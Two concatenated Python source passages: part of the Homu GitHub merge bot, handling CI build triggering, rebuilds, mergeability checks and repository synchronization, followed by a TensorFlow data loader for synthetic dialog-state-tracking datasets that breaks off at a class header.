                # Record the trigger so build results can be matched later.
                with db.get_connection() as db_conn:
                    try:
                        build_count = len(repo_cfg['testrunners']['builders'])
                    except KeyError:
                        build_count = 0
                    sql = 'REPLACE INTO build_triggers ' \
                          '(branch, trigger_sha, target_sha, build_count) ' \
                          'VALUES (%s, %s, %s, %s)'
                    db_conn.cursor().execute(sql, [pr_branch_name,
                                                   commit.sha,
                                                   merge_commit.sha,
                                                   build_count])
                    db_conn.commit()
            else:
                report_error('Failed to create pull.')
        else:
            report_error('Failed to create commit.')
    else:
        report_error('Failed to create PR branch.')
    return merge_commit
def start_build(state, repo_cfgs, trigger_author_cfg, buildbot_slots, logger, gh):
    """Create the merge commit for `state` and kick off a test build.

    Returns True when a build was started (or a Buildbot slot is busy),
    False when creating the merge failed.
    """
    if buildbot_slots[0]:
        # A Buildbot build is already in flight; report "busy".
        return True

    assert state.head_sha == state.get_repo().pull_request(state.num).head.sha

    repo_cfg = repo_cfgs[state.repo_label]

    # Pick the integration branch and builder list per CI backend.
    if 'buildbot' in repo_cfg:
        branch = 'try' if state.try_ else 'auto'
        branch = repo_cfg.get('branch', {}).get(branch, branch)
        builders = repo_cfg['buildbot']['try_builders' if state.try_ else 'builders']
    elif 'travis' in repo_cfg:
        branch = repo_cfg.get('branch', {}).get('auto', 'auto')
        builders = ['travis']
    elif 'status' in repo_cfg:
        branch = repo_cfg.get('branch', {}).get('auto', 'auto')
        builders = ['status']
    elif 'testrunners' in repo_cfg:
        branch = 'merge_bot_{}'.format(state.base_ref)
        builders = repo_cfg['testrunners'].get('builders', [])
    else:
        raise RuntimeError('Invalid configuration')

    merge_commit = create_merge(state, repo_cfg, trigger_author_cfg, branch, gh)
    if not merge_commit:
        return False

    state.init_build_res(builders)
    state.merge_sha = merge_commit.sha
    state.save()

    if 'buildbot' in repo_cfg:
        # Occupy the single Buildbot slot with this merge.
        buildbot_slots[0] = state.merge_sha

    pr_url = state.get_repo().pull_request(state.num).html_url
    msg = 'Starting build of {}/{}#{} on {}: {} {}'.format(state.owner,
                                                           state.name,
                                                           state.num,
                                                           branch,
                                                           state.merge_sha,
                                                           pr_url)
    logger.info(msg)

    state.set_status('pending')
    desc = '{} commit {:.7} with merge {:.7}...'.format('Trying' if state.try_ else 'Testing', state.head_sha, state.merge_sha)
    github_create_status = partial(utils.github_create_status,
                                   repo=state.get_repo(),
                                   sha=state.head_sha,
                                   state='pending',
                                   description=desc)
    if 'testrunners' in repo_cfg:
        # One GitHub status per test-runner builder.
        for builder in builders:
            github_create_status(context='merge-test/{}'.format(builder))
    else:
        github_create_status(context='homu')

    state.add_comment(':hourglass: ' + desc)

    return True
def start_rebuild(state, repo_cfgs):
    """Retry only the failed Buildbot builders, reusing successful results.

    Returns True if rebuilds were triggered; False when rebuilding does not
    apply (non-Buildbot repo, missing result URLs, no mix of pass/fail, or
    the saved merge is no longer based on the branch head).
    """
    repo_cfg = repo_cfgs[state.repo_label]

    if 'buildbot' not in repo_cfg or not state.build_res:
        return False

    builders = []
    succ_builders = []

    for builder, info in state.build_res.items():
        if not info['url']:
            return False

        if info['res']:
            succ_builders.append([builder, info['url']])
        else:
            builders.append([builder, info['url']])

    if not builders or not succ_builders:
        return False

    base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
    parent_shas = [x['sha'] for x in state.get_repo().commit(state.merge_sha).parents]
    if base_sha not in parent_shas:
        # Base branch moved since the merge commit was made; full rebuild needed.
        return False

    utils.github_set_ref(state.get_repo(), 'tags/homu-tmp', state.merge_sha, force=True)

    builders.sort()
    succ_builders.sort()

    with buildbot_sess(repo_cfg) as sess:
        for builder, url in builders:
            res = sess.post(url + '/rebuild', allow_redirects=False, data={
                'useSourcestamp': 'exact',
                'comments': 'Initiated by Homu',
            })

            if 'authzfail' in res.text:
                err = 'Authorization failed'
            elif builder in res.text:
                err = ''
            else:
                mat = re.search('<title>(.+?)</title>', res.text)
                err = mat.group(1) if mat else 'Unknown error'

            if err:
                state.add_comment(':bomb: Failed to start rebuilding: `{}`'.format(err))
                return False

    state.set_status('pending')

    msg_1 = 'Previous build results'
    msg_2 = ' for {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in succ_builders))
    msg_3 = ' are reusable. Rebuilding'
    msg_4 = ' only {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in builders))

    utils.github_create_status(state.get_repo(), state.head_sha, 'pending', '', '{}{}...'.format(msg_1, msg_3), context='homu')
    state.add_comment(':zap: {}{}{}{}...'.format(msg_1, msg_2, msg_3, msg_4))

    return True
def start_build_or_rebuild(state, repo_cfgs, trigger_author_cfg, gh, *args):
    """Try a cheap Buildbot rebuild first; fall back to a full build."""
    rebuilt = start_rebuild(state, repo_cfgs)
    return rebuilt or start_build(state, repo_cfgs, trigger_author_cfg, gh, *args)
def process_queue(states, repos, repo_cfgs, trigger_author_cfg, logger,
                  buildbot_slots, gh):
    """Scan every repo's PR states (best candidates first) and start at most
    one build, returning as soon as a build was started.

    A pending non-try build blocks further auto builds for that repo.
    """
    for repo_label, repo in repos.items():
        repo_states = sorted(states[repo_label].values())

        for state in repo_states:
            if state.status == 'pending' and not state.try_:
                # An auto build is already running for this repo; wait.
                break

            elif state.status == '' and state.approved_by:
                if start_build_or_rebuild(state, repo_cfgs, trigger_author_cfg,
                                          buildbot_slots, logger, gh):
                    return

            elif state.status == 'success' and state.try_ and state.approved_by:
                # Successful try build on an approved PR: promote it to auto.
                state.try_ = False
                state.save()

                if start_build(state, repo_cfgs, trigger_author_cfg, buildbot_slots, logger, gh):
                    return

        # Second pass: start pending try builds.
        for state in repo_states:
            if state.status == '' and state.try_:
                if start_build(state, repo_cfgs, trigger_author_cfg, buildbot_slots, logger, gh):
                    return
def fetch_mergeability(mergeable_que):
    """Worker loop resolving GitHub mergeability for queued pull requests.

    Pulls (state, cause) pairs off `mergeable_que` forever. GitHub computes
    mergeability lazily, so a missing PR or a None `mergeable` is retried
    once after 5 seconds. When a previously-mergeable PR turns unmergeable,
    a comment naming the likely culprit (parsed from `cause`) is posted.
    """
    re_pull_num = re.compile('(?i)merge (?:of|pull request) #([0-9]+)')

    while True:
        try:
            state, cause = mergeable_que.get()

            pr = state.get_repo().pull_request(state.num)
            if pr is None:
                # PR may not be visible yet; retry once after a short wait.
                time.sleep(5)
                pr = state.get_repo().pull_request(state.num)
            mergeable = pr.mergeable
            if mergeable is None:
                # GitHub computes mergeability asynchronously; retry once.
                time.sleep(5)
                mergeable = pr.mergeable

            if state.mergeable is True and mergeable is False:
                if cause:
                    mat = re_pull_num.search(cause['title'])
                    if mat:
                        issue_or_commit = '#' + mat.group(1)
                    else:
                        issue_or_commit = cause['sha'][:7]
                    issue_or_commit = \
                        ' (presumably {})'.format(issue_or_commit)
                else:
                    issue_or_commit = ''

                state.add_comment(':x: The latest upstream changes{} made '
                    'this pull request unmergeable. Please resolve the merge '
                    'conflicts.'.format(issue_or_commit))

            state.set_mergeable(mergeable, que=False)
        except Exception:
            # Was a bare `except:`, which also swallowed SystemExit and
            # KeyboardInterrupt, making this worker thread unkillable.
            traceback.print_exc()
        finally:
            mergeable_que.task_done()
def synchronize(repo_label, repo_cfg, logger, gh, states, repos, mergeable_que,
                my_username, repo_labels):
    """Rebuild all in-memory and DB state for one repository from GitHub.

    Wipes the repo's rows from the database, then replays every open PR
    (skipping ones untouched for roughly two months) along with its review
    and issue comments to reconstruct each PullReqState.
    """
    logger.info('Synchronizing {}...'.format(repo_label))

    db = Database()
    repo = gh.repository(repo_cfg['owner'], repo_cfg['name'])

    # XXX This is dangerous. We have a publicly exposed method to destroy state.
    with db.get_connection() as db_conn:
        for tbl in ['pull', 'build_res', 'mergeable']:
            sql = 'DELETE FROM {} WHERE repo = %s'.format(tbl)
            db_conn.cursor().execute(sql, [repo_label])
            db_conn.commit()

    states[repo_label] = {}
    repos[repo_label] = repo

    for pull in repo.iter_pulls(state='open'):
        # Ignore PRs older than about two months.
        update_delta = datetime.now(timezone.utc) - pull.updated_at
        if 5e6 < update_delta.total_seconds():
            logger.debug('Ignoring PR for merge {} because it has not ' \
                         'been updated since {}.'.format(pull.merge_commit_sha,
                                                         pull.updated_at))
            continue
        with db.get_connection() as db_conn:
            cursor = db_conn.cursor()
            sql = 'SELECT status FROM pull WHERE repo = %s AND num = %s'
            cursor.execute(sql, [repo_label, pull.number])
            row = cursor.fetchone()
        if row:
            status = row[0]
        else:
            # No saved status; fall back to the 'homu' commit status on GitHub.
            status = ''
            for info in utils.github_iter_statuses(repo, pull.head.sha):
                if info.context == 'homu':
                    status = info.state
                    break

        state = PullReqState(pull.number, pull.head.sha, status, repo_label,
                             mergeable_que, gh, repo_cfg['owner'],
                             repo_cfg['name'], repos)
        state.title = pull.title
        state.body = pull.body
        state.head_ref = pull.head.repo[0] + ':' + pull.head.ref
        state.base_ref = pull.base.ref
        state.set_mergeable(None)
        state.assignee = pull.assignee.login if pull.assignee else ''

        # Replay review comments pinned to the current head commit.
        for comment in pull.iter_comments():
            if comment.original_commit_id == pull.head.sha:
                parse_commands(
                    comment.body,
                    comment.user.login,
                    repo_cfg,
                    state,
                    my_username,
                    sha=comment.original_commit_id,
                )

        # Replay all issue comments on the PR.
        for comment in pull.iter_issue_comments():
            parse_commands(
                comment.body,
                comment.user.login,
                repo_cfg,
                state,
                my_username,
            )

        state.save()

        states[repo_label][pull.number] = state

    logger.info('Done synchronizing {}!'.format(repo_label))
    logger.debug('Github rate limit status: {}'.format(gh.rate_limit()))
def arguments():
    """Parse command-line options for the bot."""
    description = ('A bot that integrates with GitHub and '
                   'your favorite continuous integration service')
    parser = argparse.ArgumentParser(description=description)
    parser.add_argument('-v', '--verbose', action='store_true',
                        help='Enable more verbose logging')
    return parser.parse_args()
def main():
    """Bot entry point: load config, restore saved DB state, start workers."""
    args = arguments()

    logger = logging.getLogger('homu')
    logger.setLevel(logging.DEBUG if args.verbose else logging.INFO)
    logger.addHandler(logging.StreamHandler())

    # Prefer TOML configuration; fall back to the legacy JSON file.
    try:
        with open('cfg.toml') as fp:
            cfg = toml.loads(fp.read())
    except FileNotFoundError:
        with open('cfg.json') as fp:
            cfg = json.loads(fp.read())

    trigger_author_cfg = cfg.get('trigger_author', {})
    gh = github3.login(token=cfg['github']['access_token'])
    rate_limit = gh.rate_limit()
    logger.debug('Github rate limit status: {}'.format(rate_limit))
    if not rate_limit['rate']['remaining']:
        # Out of API quota: sleep until GitHub resets the limit.
        reset_time = datetime.fromtimestamp(rate_limit['rate']['reset'])
        logger_msg = 'Github rate limit exhausted! Sleeping until {}'
        logger.info(logger_msg.format(reset_time.isoformat()))
        reset_delta = reset_time - datetime.now()
        time.sleep(reset_delta.total_seconds())

    states = {}
    repos = {}
    repo_cfgs = {}
    buildbot_slots = ['']
    my_username = gh.user().login
    repo_labels = {}
    mergeable_que = Queue()

    db = Database()
    with db.get_connection() as db_conn:
        # Ensure the schema exists before reading saved state.
        schema_path = os.path.join(os.path.dirname(__file__), 'schema.sql')
        schema = open(schema_path).read()
        # execute with multi=True requires enumeration.
        list(db_conn.cursor().execute(multi=True, operation=schema))

        # Restore every configured repo's PullReqState rows from `pull`.
        for repo_label, repo_cfg in cfg['repo'].items():
            repo_cfgs[repo_label] = repo_cfg
            repo_labels[repo_cfg['owner'], repo_cfg['name']] = repo_label

            repo_states = {}
            repos[repo_label] = None

            cursor = db_conn.cursor()
            cursor.execute('SELECT num, head_sha, status, title, body, ' \
                           'head_ref, base_ref, assignee, approved_by, ' \
                           'priority, try_, rollup, merge_sha FROM pull ' \
                           'WHERE repo = %s', [repo_label])
            for (num, head_sha, status, title, body, head_ref, base_ref,
                 assignee, approved_by, priority, try_, rollup,
                 merge_sha) in cursor.fetchall():
                state = PullReqState(num, head_sha, status, repo_label,
                                     mergeable_que, gh, repo_cfg['owner'],
                                     repo_cfg['name'], repos)
                state.title = title
                state.body = body
                state.head_ref = head_ref
                state.base_ref = base_ref
                state.set_mergeable(None)
                state.assignee = assignee
                state.approved_by = approved_by
                state.priority = int(priority)
                state.try_ = bool(try_)
                state.rollup = bool(rollup)

                if merge_sha:
                    # Recover the builder list for the in-flight merge.
                    if 'buildbot' in repo_cfg:
                        builders = repo_cfg['buildbot']['builders']
                    elif 'travis' in repo_cfg:
                        builders = ['travis']
                    elif 'status' in repo_cfg:
                        builders = ['status']
                    elif 'testrunners' in repo_cfg:
                        builders = repo_cfg['testrunners'].get('builders', [])
                    else:
                        raise RuntimeError('Invalid configuration')

                    state.init_build_res(builders, use_db=False)
                    state.merge_sha = merge_sha

                elif state.status == 'pending':
                    # FIXME: There might be a better solution
                    state.status = ''
                    state.save()

                repo_states[num] = state

            states[repo_label] = repo_states

        # Re-attach saved build results, dropping rows that no longer match.
        cursor = db_conn.cursor()
        cursor.execute('SELECT repo, num, builder, res, url, merge_sha FROM build_res')
        for repo_label, num, builder, res, url, merge_sha in cursor.fetchall():
            try:
                state = states[repo_label][num]
                if builder not in state.build_res: raise KeyError
                if state.merge_sha != merge_sha: raise KeyError
            except KeyError:
                cursor = db_conn.cursor()
                cursor.execute('DELETE FROM build_res WHERE repo = %s AND ' \
                               'num = %s AND builder = %s',
                               [repo_label, num, builder])
                db_conn.commit()
                continue

            state.build_res[builder] = {
                'res': bool(res) if res is not None else None,
                'url': url,
            }

        # Re-attach cached mergeability, dropping rows for unknown PRs.
        cursor = db_conn.cursor()
        cursor.execute('SELECT repo, num, mergeable FROM mergeable')
        for repo_label, num, mergeable in cursor.fetchall():
            try: state = states[repo_label][num]
            except KeyError:
                cursor = db_conn.cursor()
                cursor.execute('DELETE FROM mergeable WHERE repo = %s AND ' \
                               'num = %s', [repo_label, num])
                db_conn.commit()
                continue

            state.mergeable = bool(mergeable) if mergeable is not None else None

    queue_handler_lock = Lock()
    def queue_handler():
        # The lock serializes queue processing across caller threads.
        with queue_handler_lock:
            return process_queue(states, repos, repo_cfgs,
                                 trigger_author_cfg, logger,
                                 buildbot_slots, gh)

    # NOTE(review): imported here rather than at module top, presumably to
    # avoid an import cycle — confirm.
    from . import server
    Thread(target=server.start, args=[cfg, states, queue_handler, repo_cfgs,
                                      repos, logger, buildbot_slots,
                                      my_username, repo_labels,
                                      mergeable_que, gh]).start()

    Thread(target=fetch_mergeability, args=[mergeable_que]).start()

    # One synchronization thread per configured repository.
    for repo_label, repo_cfg in cfg['repo'].items():
        t = Thread(target=synchronize,
                   args=[repo_label, repo_cfg, logger, gh, states, repos,
                         mergeable_que, my_username, repo_labels])
        t.start()

    queue_handler()
if __name__ == '__main__':
    # On SIGTERM, close all database connections.
    signal.signal(signal.SIGTERM, lambda x, y: Database().close_all())
    main()
|
# coding=utf-8
# Copyright 2021 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Data loader for goal-oriented dialog state tracking datasets.
Dialog state tracking is a sequence prediction task that predicts the dialog
state label of each conversational turn in a given dialog. Currently, the
following datasets are supported.
* Synthetic Task-oriented Dialog with Controllable Complexity (SimDial) [1]
* Synthetic Multi-Domain Wizard-of-Oz (MultiWoZ-Synth) [2, 4]
* Synthetic Schema-Guided Dialogue Dataset (SGD-Synth) [3]
## References
[1]: Tiancheng Zhao and Maxine Eskenazi. Zero-Shot Dialog Generation with
Cross-Domain Latent Actions. In _Meeting of the Special Interest Group on
Discourse and Dialogue_ (SIGDIAL), 2018.
https://www.aclweb.org/anthology/W18-5001/
[2]: Pawel Budzianowski et al. MultiWOZ - A Large-Scale Multi-Domain
Wizard-of-Oz Dataset for Task-Oriented Dialogue Modelling.
In _Proceedings of the 2018 Conference on Empirical Methods in Natural
Language Processing_ (EMNLP), 2018.
https://aclanthology.org/D18-1547/
[3]: Abhinav Rastogi et al. Towards Scalable Multi-Domain Conversational Agents:
The Schema-Guided Dialogue Dataset. In _Proceedings of the AAAI Conference
on Artificial Intelligence_ (AAAI), 2020.
https://arxiv.org/abs/1909.05855
[4]: Campagna, Giovanni et al. Zero-Shot Transfer Learning with Synthesized Data
for Multi-Domain Dialogue State Tracking.
In _Proceedings of the 58th Annual Meeting of the Association for
Computational Linguistics_ (ACL), 2020.
https://arxiv.org/abs/2005.00891
"""
import json
import os
from typing import Dict, Tuple, Optional, Any
import tensorflow.compat.v2 as tf
import tensorflow_datasets as tfds
from uncertainty_baselines.datasets import base
# Feature keys present in each serialized dialog-turn example.
USR_UTT_NAME = 'usr_utt'
SYS_UTT_NAME = 'sys_utt'
USR_UTT_RAW_NAME = 'usr_utt_raw'
SYS_UTT_RAW_NAME = 'sys_utt_raw'
STATE_LABEL_NAME = 'label'
DOMAIN_LABEL_NAME = 'domain_label'
DIAL_LEN_NAME = 'dialog_len'
DIAL_TURN_ID_NAME = 'dialog_turn_id'

# File names expected under each dataset's data directory.
FILENAME_META = 'meta.json'
FILENAME_TOKENIZER = 'id_to_vocab.json'
FILENAME_TOKENIZER_LABEL = 'id_to_vocab_label.json'
FILENAME_TOKENIZER_DOMAIN_LABEL = 'id_to_vocab_domain_label.json'
FILENAME_TRAIN = 'train.tfrecord'
FILENAME_TEST = 'test.tfrecord'

# Per-dataset constants (keyed by dataset name): maximum utterance and dialog
# lengths, vocabulary sizes, and train/test example counts.
MAX_UTT_LEN = dict(simdial=40, multiwoz_synth=42, sgd_synth=76)
MAX_DIALOG_LEN = dict(simdial=13, multiwoz_synth=7, sgd_synth=24)
VOCAB_SIZE_UTT = dict(simdial=474, multiwoz_synth=1506, sgd_synth=6709)
VOCAB_SIZE_LABEL = dict(simdial=52, multiwoz_synth=10, sgd_synth=39)
NUM_TRAIN = dict(simdial=6400, multiwoz_synth=7500, sgd_synth=8100)
NUM_TEST = dict(simdial=1600, multiwoz_synth=1500, sgd_synth=2700)

# Use test as stand-in for val. In practice we never use this dataset.
NUM_VAL = NUM_TEST
FILENAME_VALID = FILENAME_TEST
def _build_dataset(glob_dir: str, is_training: bool) -> tf.data.Dataset:
  """Builds a TFRecord dataset over the files matched by `glob_dir`.

  During training the file order is shuffled and reads are interleaved
  across 10 files; during evaluation files are read deterministically,
  one at a time.
  """
  if is_training:
    num_parallel_files = 10
  else:
    num_parallel_files = 1
  file_dataset = tf.data.Dataset.list_files(glob_dir, shuffle=is_training)
  return file_dataset.interleave(
      tf.data.TFRecordDataset, cycle_length=num_parallel_files)
def _make_features_spec(
    load_domain_label: bool) -> Dict[str, tf.io.FixedLenFeature]:
  """Specifies dataset example feature types.

  All features are serialized-tensor strings except the dialog length,
  which is a plain int64. The domain label feature is only present when
  `load_domain_label` is True.
  """

  def _string_feature() -> tf.io.FixedLenFeature:
    return tf.io.FixedLenFeature([], tf.string, default_value='')

  string_keys = [
      USR_UTT_NAME, SYS_UTT_NAME, USR_UTT_RAW_NAME, SYS_UTT_RAW_NAME,
      STATE_LABEL_NAME
  ]
  feature_spec = {key: _string_feature() for key in string_keys}
  feature_spec[DIAL_LEN_NAME] = tf.io.FixedLenFeature(
      [], tf.int64, default_value=0)
  if load_domain_label:
    feature_spec[DOMAIN_LABEL_NAME] = _string_feature()
  return feature_spec
def _get_num_examples_and_filenames(
    dataset_name) -> Tuple[Dict[str, int], Dict[str, str]]:
  """Retrieves the number of examples and filenames according to data mode."""
  counts_by_split = {
      'train': NUM_TRAIN,
      'validation': NUM_VAL,
      'test': NUM_TEST,
  }
  num_examples = {
      split: table[dataset_name] for split, table in counts_by_split.items()
  }
  file_names = dict(
      train=FILENAME_TRAIN,
      validation=FILENAME_VALID,
      test=FILENAME_TEST,
      metadata=FILENAME_META)
  return num_examples, file_names
def load_json(json_dir: str) -> Dict[Any, Any]:
  """Loads and parses the JSON file at `json_dir`.

  Uses tf.io.gfile, so the path may live on any filesystem TF supports
  (local disk, GCS, etc.).
  """
  with tf.io.gfile.GFile(json_dir) as json_file:
    return json.load(json_file)
_CITATION = {
'simdial':
"""
@article{zhao2018zero,
title={Zero-Shot Dialog Generation with Cross-Domain Latent Actions},
author={Zhao, Tiancheng and Eskenazi, Maxine},
journal={arXiv preprint arXiv:1805.04803},
year={2018}
}
"""
}
_HOMEPAGE = {'simdial': 'https://github.com/snakeztc/SimDial'}
_DESCRIPTION = {
'simdial':
('Simulated goal-oriented conversations [1] generated for information '
'requests in four domains: bus, restaurant, weather, and movie.')
}
class _DialogStateTrackingDatasetBuilder(tfds.core.DatasetBuilder):
  """Minimal TFDS DatasetBuilder, does not support downloading.

  Reads pre-generated TFRecord files plus a `meta.json` metadata file from
  `data_dir`. Downloading is deliberately unsupported (see
  `_download_and_prepare`).
  """
  VERSION = tfds.core.Version('1.0.0')
  RELEASE_NOTES = {
      '1.0.0': 'Initial release.',
  }

  def __init__(self, name, data_dir, load_domain_label, **kwargs):
    # `name` selects the per-dataset constants (NUM_TRAIN, NUM_TEST, ...).
    self._data_name = name
    self._num_examples, self._file_names = _get_num_examples_and_filenames(name)
    self._file_paths = self._get_file_paths(data_dir)
    self._load_domain_label = load_domain_label
    super().__init__(data_dir=data_dir, **kwargs)
    # We have to reset self._data_dir since the parent class appends the class
    # name and version to dir name.
    self._data_dir = data_dir

  def _download_and_prepare(self, dl_manager, download_config=None):
    """Downloads and prepares dataset for reading."""
    raise NotImplementedError(
        'Must provide a data_dir with the files already downloaded to.')

  def _get_file_paths(self, data_dir) -> Dict[str, str]:
    """Returns the full path under `data_dir` for each split and metadata."""
    get_full_path = lambda name: os.path.join(data_dir, name)
    return {
        'train': get_full_path(self._file_names['train']),
        'validation': get_full_path(self._file_names['validation']),
        'test': get_full_path(self._file_names['test']),
        'metadata': get_full_path(self._file_names['metadata'])
    }

  def _as_dataset(self,
                  split: tfds.Split,
                  decoders=None,
                  read_config=None,
                  shuffle_files=False) -> tf.data.Dataset:
    """Constructs a `tf.data.Dataset` for the requested split."""
    # The tfds read options are ignored; shuffling is decided solely by
    # whether the requested split is TRAIN.
    del decoders
    del read_config
    del shuffle_files
    if split == tfds.Split.TRAIN:
      return _build_dataset(
          glob_dir=self._file_paths['train'], is_training=True)
    elif split == tfds.Split.VALIDATION:
      return _build_dataset(
          glob_dir=self._file_paths['validation'], is_training=False)
    elif split == tfds.Split.TEST:
      return _build_dataset(
          glob_dir=self._file_paths['test'], is_training=False)
    raise ValueError('Unsupported split given: {}.'.format(split))

  def _info(self) -> tfds.core.DatasetInfo:
    """Returns the `tfds.core.DatasetInfo` object."""
    metadata_dict = load_json(self._file_paths['metadata'])
    has_domain_label = metadata_dict.get('has_domain_label', False)
    features = {
        USR_UTT_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
        SYS_UTT_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
        USR_UTT_RAW_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
        SYS_UTT_RAW_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
        STATE_LABEL_NAME: tfds.features.Tensor(shape=[], dtype=tf.string),
        DIAL_LEN_NAME: tfds.features.Tensor(shape=[], dtype=tf.int64)
    }
    # Optionally, load domain labels if it exists.
    if self._load_domain_label and has_domain_label:
      features[DOMAIN_LABEL_NAME] = tfds.features.Tensor(
          shape=[], dtype=tf.string)
    elif self._load_domain_label and not has_domain_label:
      # BUG FIX: the two adjacent string literals previously concatenated to
      # "...domain labelaccording..." -- a space was missing.
      raise ValueError(
          'load_domain_label=True, but the dataset does not have domain label '
          'according to metadata ({}).'.format(self._file_paths['metadata']))
    info = tfds.core.DatasetInfo(
        builder=self,
        features=tfds.features.FeaturesDict(features),
        # Note that while metadata seems to be the most appropriate way to store
        # arbitrary info, it will not be printed when printing out the dataset
        # info.
        metadata=tfds.core.MetadataDict(**metadata_dict),
        description=_DESCRIPTION.get(self._data_name, ''),
        homepage=_HOMEPAGE.get(self._data_name, ''),
        citation=_CITATION.get(self._data_name, ''))
    # Instead of having a single element shard_lengths, we should really have a
    # list of the number of elements in each file shard in each split.
    split_infos = [
        tfds.core.SplitInfo(
            name=tfds.Split.VALIDATION,
            shard_lengths=[self._num_examples['validation']],
            num_bytes=0,
        ),
        tfds.core.SplitInfo(
            name=tfds.Split.TEST,
            shard_lengths=[self._num_examples['test']],
            num_bytes=0,
        ),
        tfds.core.SplitInfo(
            name=tfds.Split.TRAIN,
            shard_lengths=[self._num_examples['train']],
            num_bytes=0,
        ),
    ]
    split_dict = tfds.core.SplitDict(
        split_infos, dataset_name='__dialog_state_tracking_dataset_builder')
    info.set_splits(split_dict)
    return info
class _DialogStateTrackingDataset(base.BaseDataset):
  """Base data loader for the dialog state tracking datasets."""

  def __init__(self,
               name: str,
               split: str,
               load_domain_label: bool = True,
               add_dialog_turn_id: Optional[bool] = False,
               shuffle_buffer_size: Optional[int] = None,
               num_parallel_parser_calls: int = 64,
               data_dir: Optional[str] = None,
               download_data: bool = False,
               is_training: Optional[bool] = None,
               **kwargs: Any):
    """Create a dialog state tracking tf.data.Dataset builder.

    Args:
      name: the name of the dataset.
      split: a dataset split, either a custom tfds.Split or one of the
        tfds.Split enums [TRAIN, VALIDATION, TEST] or their lowercase string
        names.
      load_domain_label: Whether to load dialog domain labels as well.
        Currently only works for `SGDSynthDataset`.
      add_dialog_turn_id: Whether to add a unique id for each dialog turn.
      shuffle_buffer_size: the number of example to use in the shuffle buffer
        for tf.data.Dataset.shuffle().
      num_parallel_parser_calls: the number of parallel threads to use while
        preprocessing in tf.data.Dataset.map().
      data_dir: path to a directory containing the tfrecord datasets.
      download_data: Whether or not to download data before loading. Currently
        unsupported and ignored; files must already exist under `data_dir`.
      is_training: Whether or not the given `split` is the training split. Only
        required when the passed split is not one of ['train', 'validation',
        'test', tfds.Split.TRAIN, tfds.Split.VALIDATION, tfds.Split.TEST].
      **kwargs: optional arguments passed to base.BaseDataset.__init__.
    """
    # Load vocab for dialog utterances and state labels.
    self.load_domain_label = load_domain_label
    # Specify a unique id for a turn in a dialog.
    self.add_dialog_turn_id = add_dialog_turn_id
    self.vocab_utter = load_json(os.path.join(data_dir, FILENAME_TOKENIZER))
    self.vocab_label = load_json(
        os.path.join(data_dir, FILENAME_TOKENIZER_LABEL))
    if self.load_domain_label:
      self.vocab_domain_label = load_json(
          os.path.join(data_dir, FILENAME_TOKENIZER_DOMAIN_LABEL))
    dataset_builder = _DialogStateTrackingDatasetBuilder(
        name, data_dir, load_domain_label)
    super().__init__(
        name=name,
        dataset_builder=dataset_builder,
        split=split,
        is_training=is_training,
        shuffle_buffer_size=shuffle_buffer_size,
        num_parallel_parser_calls=num_parallel_parser_calls,
        # Downloading is unsupported by the builder, so this is hard-coded to
        # False regardless of the `download_data` argument.
        download_data=False,
        **kwargs)

  def _create_process_example_fn(self) -> base.PreProcessFn:

    def _example_parser(example: Dict[str, tf.Tensor]) -> Dict[str, tf.Tensor]:
      """Parse features and labels from a serialized tf.train.Example."""
      features_spec = _make_features_spec(self.load_domain_label)
      features = tf.io.parse_single_example(example['features'], features_spec)
      sys_utt = tf.io.parse_tensor(features[SYS_UTT_NAME], out_type=tf.int32)
      usr_utt = tf.io.parse_tensor(features[USR_UTT_NAME], out_type=tf.int32)
      sys_utt_raw = tf.io.parse_tensor(
          features[SYS_UTT_RAW_NAME], out_type=tf.string)
      usr_utt_raw = tf.io.parse_tensor(
          features[USR_UTT_RAW_NAME], out_type=tf.string)
      state_label = tf.io.parse_tensor(
          features[STATE_LABEL_NAME], out_type=tf.int32)
      dialog_len = features[DIAL_LEN_NAME]

      # Extract maximum dialog and utterance lengths.
      max_dialog_len = MAX_DIALOG_LEN[self.name]
      max_utt_len = MAX_UTT_LEN[self.name]

      # Ensure shape of parsed tensors.
      sys_utt = tf.ensure_shape(sys_utt, (max_dialog_len, max_utt_len))
      usr_utt = tf.ensure_shape(usr_utt, (max_dialog_len, max_utt_len))
      sys_utt_raw = tf.ensure_shape(sys_utt_raw, (max_dialog_len,))
      usr_utt_raw = tf.ensure_shape(usr_utt_raw, (max_dialog_len,))
      state_label = tf.ensure_shape(state_label, (max_dialog_len,))

      # BUG FIX: the raw utterance keys were previously swapped --
      # `usr_utt_raw` held the system utterances and vice versa.
      parsed_example = {
          SYS_UTT_NAME: sys_utt,
          USR_UTT_NAME: usr_utt,
          USR_UTT_RAW_NAME: usr_utt_raw,
          SYS_UTT_RAW_NAME: sys_utt_raw,
          STATE_LABEL_NAME: state_label,
          DIAL_LEN_NAME: dialog_len,
      }

      # Optionally, load domain labels.
      if self.load_domain_label:
        domain_label = tf.io.parse_tensor(
            features[DOMAIN_LABEL_NAME], out_type=tf.int32)
        domain_label = tf.ensure_shape(domain_label, (max_dialog_len,))
        parsed_example[DOMAIN_LABEL_NAME] = domain_label

      if self.add_dialog_turn_id:
        # Give turn t of example e the globally-unique integer id
        # e * max_dialog_len + t, derived from the example fingerprint.
        example_id = example[self._fingerprint_key]
        dialog_turn_id = tf.range(
            example_id * max_dialog_len, (example_id + 1) * max_dialog_len,
            dtype=tf.int32)
        # BUG FIX: `(max_dialog_len)` is just a parenthesized int, not the
        # intended 1-element shape tuple.
        dialog_turn_id = tf.ensure_shape(dialog_turn_id, (max_dialog_len,))
        parsed_example[DIAL_TURN_ID_NAME] = dialog_turn_id
      return parsed_example

    return _example_parser
class SimDialDataset(_DialogStateTrackingDataset):
  """Data loader for the SimDial synthetic dialog dataset."""

  def __init__(self, data_dir=None, **kwargs):
    super().__init__(name='simdial', data_dir=data_dir, **kwargs)
class MultiWoZSynthDataset(_DialogStateTrackingDataset):
